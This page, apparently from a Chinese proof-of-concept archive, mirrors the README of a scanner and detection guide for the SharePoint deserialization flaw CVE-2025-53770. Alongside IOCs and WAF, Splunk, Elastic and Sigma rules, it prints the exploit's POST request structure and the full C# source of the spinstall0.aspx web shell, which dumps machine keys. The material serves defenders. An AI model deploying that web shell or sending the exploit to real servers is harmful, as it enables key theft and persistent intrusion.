漏洞平台

POC详情： d57ac43b4667d6681347b74dc1fdd620696683d6

来源

https://github.com/ZephrFish/CVE-2025-53770-Scanner

关联漏洞

标题： Microsoft SharePoint Server 安全漏洞 (CVE-2025-53770)
描述：Microsoft SharePoint Server是美国微软（Microsoft）公司的一款协作平台。 Microsoft SharePoint Server存在安全漏洞，该漏洞源于反序列化不受信任数据，可能导致远程代码执行。

描述

ToolShell scanner - CVE-2025-53770 and detection information

介绍

# CVE-2025-53770 SharePoint Vulnerability Scanner

100% hacked together with all the tweets floating around with payloads and different attacks, so comes with zero warranty etc. The scanner is designed to identify vulnerable instances and has a config with known uses in the wild of exploitation, it's primarily designed for defensive use to identify vulnerable instances and allow you to patch things.

This scanner performs automated checks of SharePoint deployments by:
- Sending crafted POST requests to SharePoint ToolPane endpoints with exploit payloads
- Detecting machine key extraction attempts and successful exploitation
- Identifying secondary payload deployment (spinstall0.aspx)
- Analyzing responses for vulnerability indicators based on observed attack patterns
- Providing detailed reporting with confidence levels and immediate action alerts
- Supporting concurrent scanning for efficiency

## Key Detection Capabilities

### CRITICAL: Machine Key Extraction Detection
- Detects successful machine key extraction responses
- Identifies ValidationKey, DecryptionKey, and CompatibilityMode exposure
- Recognizes pipe-delimited machine key patterns (ValidationKey|Validation|DecryptionKey|Decryption|CompatibilityMode)
- Triggers immediate action alerts for compromised systems

### Secondary Payload Detection  
- Identifies spinstall0.aspx deployment attempts
- Detects C# ASP.NET payload code patterns
- Recognizes System.Web.Configuration.MachineKeySection usage
- Version-specific path detection (`SP2013: WEBSER~1\15\ vs SP2016+: WEBSER~1\16\`)

## Installation

1. Clone the repository:
```bash
git clone https://github.com/ZephrFish/CVE-2025-53770-Scanner
cd CVE-2025-53770-Scanner
```

2. Install dependencies:
```bash
pip install -r requirements.txt
```

## Usage

### Basic Usage

Create a text file with target hosts (one per line):
```
sharepoint1.example.com
sharepoint2.example.net
internal-sp.company.local
```

Run the scanner:
```bash
python3 scanner.py -i hosts.txt

python3 scanner.py -i hosts.txt -o results.json -l scan.log -t 20 -v
```

### Command Line Options

| Option | Description | Default |
|--------|-------------|---------|
| `-i, --input` | Path to host list file (required) | - |
| `-o, --output` | Output file for results (.json, .csv, .txt) | None |
| `-l, --logfile` | Log file path for detailed logging | None |
| `-t, --threads` | Number of concurrent threads | 10 |
| `-v, --verbose` | Enable verbose output and logging | False |

### Output Formats

#### JSON Output (`-o results.json`)
```json
[
  {
    "host": "sharepoint.example.com",
    "url": "https://sharepoint.example.com/_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx",
    "scan_time": "2025-07-21T10:30:00.123456",
    "vulnerable": true,
    "status_code": 200,
    "response_size": 15432,
    "error": null,
    "response_time": 1.23
  }
]
```

#### CSV Output (`-o results.csv`)
Provides tabular data suitable for spreadsheet analysis with columns for all scan metrics.

#### Text Output (`-o results.txt`)
Human-readable format with vulnerability status and scan details.

## Vulnerability Details

**CVE-2025-53770** targets a deserialization vulnerability in SharePoint's ExcelDataSet component that has been actively exploited in the wild. The scanner detects:

### Identified Attack Patterns
1. **Initial Exploitation**: POST request to `/_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx` with serialized payload
2. **Machine Key Extraction**: Successful exploitation returns pipe-delimited machine configuration:
   ```
   ValidationKey|Validation|DecryptionKey|Decryption|CompatibilityMode
   Example: [128-256 hex chars]|HMACSHA256|[48-96 hex chars]|AES|Framework45
   ```
3. **Secondary Payload**: Deployment of `spinstall0.aspx` for persistent access and key extraction
4. **Version Targeting**: Different paths for SharePoint versions (15/ vs 16/ layouts)

### Confirmed IOCs from Active Exploitation
- **User-Agent**: `Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0`
- **Referer**: `/_layouts/SignOut.aspx`
- **Content-Length**: Typically 7699-8000+ bytes
- **Payload Size**: Large base64-encoded CompressedDataTable parameters
- **Response Indicators**: Machine key strings, spinstall0.aspx deployment
- **Attack Infrastructure**: 65.38.121.198, 162.243.204.189, 165.22.18.129

### Detection Logic
The scanner analyzes responses for:
1. Machine key extraction patterns (CRITICAL confidence)
2. Secondary payload indicators (HIGH confidence) 
3. ExcelDataSet/Scorecard component processing (MEDIUM confidence)
4. ToolPane error patterns and anomalous response characteristics (LOW confidence)

## Security Considerations

- This tool is designed for **authorized security testing only**
- Ensure proper authorization before scanning any systems
- Scanner uses HTTPS by default but accepts self-signed certificates
- Logs may contain sensitive information - secure appropriately
- Consider network impact when using high thread counts

## Example Scan Session

```bash
$ python3 scanner.py -i corporate-sharepoint.txt -o vuln-results.json -l scan.log -v

Starting scan of 150 hosts with 10 threads...
Target CVE: CVE-2025-53770 (SharePoint ExcelDataSet deserialization)
Logging to: scan.log
Results will be saved to: vuln-results.json

[+] VULNERABLE [CRITICAL]: sp-prod-01.acme.local
[-] Not vulnerable: sp-dev-02.acme.local  
[!] ERROR: offline-sp.acme.local - Connection timeout
[+] VULNERABLE [HIGH]: sp-legacy.acme.local
Progress: 50/150 (33.3%)
Progress: 100/150 (66.7%)
Progress: 150/150 (100.0%)

============================================================
SCAN COMPLETE
============================================================
Total hosts scanned: 150
Vulnerable hosts: 3
Success rate: 97.3%

VULNERABLE HOSTS (CVE-2025-53770):

  CRITICAL - MACHINE KEY EXTRACTED (1 hosts):
    • sp-prod-01.acme.local (Response time: 0.85s, Version: 2016+)
      WARNING: IMMEDIATE ACTION REQUIRED: Machine keys compromised

  HIGH CONFIDENCE (1 hosts):
    • sp-legacy.acme.local (Response time: 1.23s, Version: 2013-2016)

  LOW CONFIDENCE (1 hosts):
    • sp-archive.acme.local (Response time: 2.10s, Version: Unknown)

Detailed results saved to: vuln-results.json
```

## Troubleshooting

### Common Issues

1. **Connection Timeouts**: Increase timeout or reduce thread count
2. **SSL Errors**: Scanner disables SSL warnings by default
3. **Permission Errors**: Ensure write access for output/log files
4. **Memory Usage**: Monitor with large host lists

### Log Analysis

Enable verbose logging (`-v`) and log files (`-l`) for detailed troubleshooting:
```bash
tail -f scan.log
```

## Exploitation Analysis

### Observed Attack Payloads

The scanner incorporates detection for confirmed exploitation patterns observed in active attacks:

#### Primary Payload Structure
```http
POST /_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx HTTP/1.1
Host: target.domain.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 7699
Content-Type: application/x-www-form-urlencoded
Referer: /_layouts/SignOut.aspx
Connection: close

MSOTlPn_Uri=http%3A%2F%2F{{host}}%2F_controltemplates%2F15%2FAclEditor.ascx
&MSOTlPn_DWP=[ExcelDataSet payload with CompressedDataTable containing serialized exploit]
```

#### Secondary Payload (spinstall0.aspx)
```csharp
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>
<script runat="server" language="c#" CODEPAGE="65001">
    public void Page_load()
    {
        var sy = System.Reflection.Assembly.Load("System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a");
        var mkt = sy.GetType("System.Web.Configuration.MachineKeySection");
        var gac = mkt.GetMethod("GetApplicationConfig", System.Reflection.BindingFlags.Static | System.Reflection.BindingFlags.NonPublic);
        var cg = (System.Web.Configuration.MachineKeySection)gac.Invoke(null, new object[0]);
        Response.Write(cg.ValidationKey+"|"+cg.Validation+"|"+cg.DecryptionKey+"|"+cg.Decryption+"|"+cg.CompatibilityMode);
    }
</script>
```

#### Expected Machine Key Response Format
```
ValidationKey: [128-256 character hex string]
Validation: HMACSHA256|HMACSHA1|SHA1
DecryptionKey: [48-96 character hex string] 
Decryption: AES|DES|3DES
CompatibilityMode: Framework20SP1|Framework45|Framework40
```

## Detection and Monitoring Guidance

### Detecting CVE-2025-53770 Exploitation Attempts

Organizations should implement the following detection mechanisms to identify potential exploitation attempts:

#### 1. Web Application Firewall (WAF) Rules

Monitor for suspicious POST requests to SharePoint ToolPane endpoints:

```
# Example WAF detection rule patterns
POST /_layouts/15/ToolPane.aspx*
POST /_layouts/*/ToolPane.aspx*
Query string: "DisplayMode=Edit&a=/ToolPane.aspx"
Request body containing: "MSOTlPn_Uri", "MSOTlPn_DWP"
Request body containing: "ExcelDataSet", "CompressedDataTable"
Request body containing: "Scorecard:ExcelDataSet"
Request body containing: "H4sIAAAAAAAEA" (gzip magic bytes in base64)
Content-Length > 5000 bytes (typical payload size)
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0)
Referer: /_layouts/SignOut.aspx
```

**exploitation patterns observed:**
- Payload sizes typically 7000-8000+ bytes
- URL-encoded compressed data in `CompressedDataTable` parameter
- Specific User-Agent string: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0)
- Content-Type: application/x-www-form-urlencoded
- Connection: close header often present
- Base64-encoded serialized .NET objects in payload
- Response contains machine keys in pipe-delimited format
- Secondary requests to deployed spinstall0.aspx files

#### 2. SharePoint ULS Logs

Monitor SharePoint Unified Logging Service (ULS) logs for:

```
Category: SharePoint Foundation Web Controls
Level: Unexpected, Error, Critical
Keywords: "ToolPane", "ExcelDataSet", "Deserialization"
Process: w3wp.exe
```

Key indicators in ULS logs:
- Unexpected exceptions in ToolPane.aspx processing
- Deserialization errors in Microsoft.PerformancePoint components
- Memory corruption or process crashes in w3wp.exe

#### 3. IIS Access Logs

Monitor IIS logs for exploitation patterns:

```
# Log analysis queries (replace with your SIEM syntax)
cs-method="POST" AND cs-uri-stem="/_layouts/15/ToolPane.aspx"
cs-method="POST" AND cs-uri-query="DisplayMode=Edit&a=/ToolPane.aspx"
cs-bytes > 7000 (typical exploit payload size)
cs(User-Agent)="Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0"
cs(Referer)="/_layouts/SignOut.aspx"
sc-status=200 AND time-taken > 5000 (slow processing indicating deserialization)
```

**Specific IOCs from real attacks:**
```
POST /_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx
Content-Length: 7699
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Referer: /_layouts/SignOut.aspx
Body contains: MSOTlPn_Uri=http%3A%2F%2F[domain]%2F_controltemplates%2F15%2FAclEditor.ascx
Body contains: CompressedDataTable%3D%22H4sIAAAAAAAEANVa23LbSJLt3stEzMzu0%2F6AQs%2B2BJCiu%2BWQ
```

#### 4. Network Traffic Analysis

Monitor network traffic for:
- Unusual POST request sizes to SharePoint servers
- Repeated requests to ToolPane.aspx from single sources
- Base64 encoded payloads in HTTP POST bodies
- Non-browser User-Agent strings targeting SharePoint

#### 5. Windows Event Logs

Monitor Windows Event Logs on SharePoint servers:

```
Event Log: Application
Source: ASP.NET, SharePoint Foundation
Event IDs: 1309, 1310 (application errors)
Event Log: System
Source: Application Error
Process: w3wp.exe crashes
```

#### 6. SIEM Detection Rules

##### Splunk Detection Query:
```spl
index=iis source="*iis*" 
| search cs_method="POST" cs_uri_stem="/_layouts/15/ToolPane.aspx" cs_uri_query="DisplayMode=Edit&a=/ToolPane.aspx"
| eval payload_size=tonumber(cs_bytes)
| where payload_size > 7000
| search cs_User_Agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0"
| stats count by src_ip, cs_uri_stem, payload_size
| sort -payload_size
```

##### Enhanced Detection for Real Attacks:
```spl
index=iis 
| search cs_method="POST" AND cs_uri_stem="/_layouts/15/ToolPane.aspx"
| where cs_bytes > 7000 AND cs_bytes < 10000
| search cs_Referer="/_layouts/SignOut.aspx"
| eval attack_pattern=if(like(cs_User_Agent, "%Windows NT 10.0; Win64; x64; rv:120.0%"), "CVE-2025-53770", "Other")
| where attack_pattern="CVE-2025-53770"
| table _time, src_ip, cs_uri_query, cs_bytes, sc_status
```

##### Elastic/Kibana Query:
```json
{
  "query": {
    "bool": {
      "must": [
        {"term": {"http.request.method": "POST"}},
        {"term": {"url.path": "/_layouts/15/ToolPane.aspx"}},
        {"term": {"url.query": "DisplayMode=Edit&a=/ToolPane.aspx"}},
        {"range": {"http.request.bytes": {"gte": 7000, "lte": 10000}}},
        {"term": {"user_agent.original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0"}},
        {"term": {"http.request.referrer": "/_layouts/SignOut.aspx"}}
      ]
    }
  }
}
```

##### Sigma Rule for CVE-2025-53770:
```yaml
title: CVE-2025-53770 SharePoint ExcelDataSet Exploitation
id: cve-2025-53770-sharepoint-exploit
description: Detects exploitation attempts of CVE-2025-53770 SharePoint deserialization vulnerability
references:
    - https://github.com/your-repo/CVE-2025-53770-Scanner
author: Security Team
date: 2025/07/21
logsource:
    category: webserver
    product: iis
detection:
    selection:
        cs-method: 'POST'
        cs-uri-stem: '/_layouts/15/ToolPane.aspx'
        cs-uri-query: 'DisplayMode=Edit&a=/ToolPane.aspx'
        cs-bytes: 
            - gte: 7000
            - lte: 10000
        cs-User-Agent: 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0'
        cs-Referer: '/_layouts/SignOut.aspx'
    condition: selection
falsepositives:
    - Legitimate SharePoint administrative activities
level: high
tags:
    - attack.initial_access
    - attack.t1190
    - cve.2025.53770
```

#### 7. Behavioral Indicators

Watch for these post-exploitation behaviors:
- Unusual outbound network connections from SharePoint servers
- New user accounts created in SharePoint or Active Directory
- Unauthorized file uploads or modifications
- Privilege escalation attempts
- Lateral movement to other systems

### Recommended Response Actions

1. **Immediate Response:**
   - Block suspicious source IPs at firewall/WAF
   - Isolate affected SharePoint servers if exploitation confirmed
   - Preserve logs and memory dumps for forensic analysis

2. **Investigation:**
   - Analyze POST request payloads for malicious content
   - Check for indicators of successful code execution
   - Review user account activities and permissions changes
   - Correlate with other security events

3. **Containment:**
   - Apply security patches immediately
   - Implement WAF rules to block exploitation attempts
   - Segment SharePoint servers from critical network resources


### SIEM Integration Examples

#### Importing Scan Results into Splunk:
```bash
# Convert scan results for Splunk ingestion
python3 scanner.py -i hosts.txt -o results.json
# Import into Splunk index
curl -k -H "Authorization: Splunk <token>" -X POST \
  "https://splunk-server:8088/services/collector" \
  -d @results.json
```

文件快照


 [4.0K]  /data/pocs/d57ac43b4667d6681347b74dc1fdd620696683d6
├── [4.6K]  config.json
├── [ 15K]  README.md
├── [  31]  requirements.txt
└── [ 40K]  scanner.py

0 directories, 4 files

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。